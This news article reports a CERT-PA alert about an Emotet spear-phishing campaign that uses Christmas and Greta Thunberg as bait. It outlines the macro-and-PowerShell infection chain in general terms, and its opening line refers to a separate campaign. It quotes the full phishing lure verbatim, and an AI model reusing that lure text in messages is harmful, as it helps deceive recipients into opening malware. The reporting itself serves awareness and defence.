The email gz attachment contains an exe. This, if opened, triggers the malware infection. Stolen data is exfiltrated via Telegram.
CERT-PA: Cybercrime combines the baits of Christmas and Greta Thunberg to convey Emotet in Italy and worldwide. An malspam campaign is underway with spear phishing attacks
Cybercrime does not even spare Greta Thunberg for carrying malware in Italy and worldwide. The alarm was raised by the CERT-PA cyber security experts on a new spear phishing campaign in progress to spread the Emotet banking trojan. The carrier is always an email with a Word attachment armed with malicious Macro. The text invites us to provide support for the activities of the young environmental activist, on the occasion of Christmas. In fact, the message reads that “You can spend Christmas Eve looking for gifts for children. They will say thank you only that day. But the children will thank you for life if you go out for the biggest protest against the government’s inaction in relation to the climate crisis. Support Greta Thunberg – Time person of the year 2019. I invite you. The time and address are in the attached file. FORWARD this letter to all colleagues, friends and relatives. RIGHT NOW until you forget. “
Cyber Security Experts: The numerous grammar and syntax errors in the email text make it clear that it is a scam. This, however, is very dangerous. Proofpoint, in fact, discovers that cybercriminals also target .edu domains
According to cyber security experts, it is clear that this is a scam. The entire text of the fake Greta Thunberg malicious email, in fact, was compiled using an automatic translator as evidenced by the numerous spelling and syntax errors. Moreover, this cybercrime campaign is very dangerous in that – as Proofpoint has pointed out – in addition to generic domains, it also targets e-mail addresses on the .edu domain. This, in fact, is reserved for schools, universities and institutions that deal with training. The institutions most involved in Greta Thunberg’s activities. The Emotet chain of infection, on the other hand, is the same: once the editing of the attached document is enabled, the macro is executed and, through a Powershell script, downloads the malware from a remote source.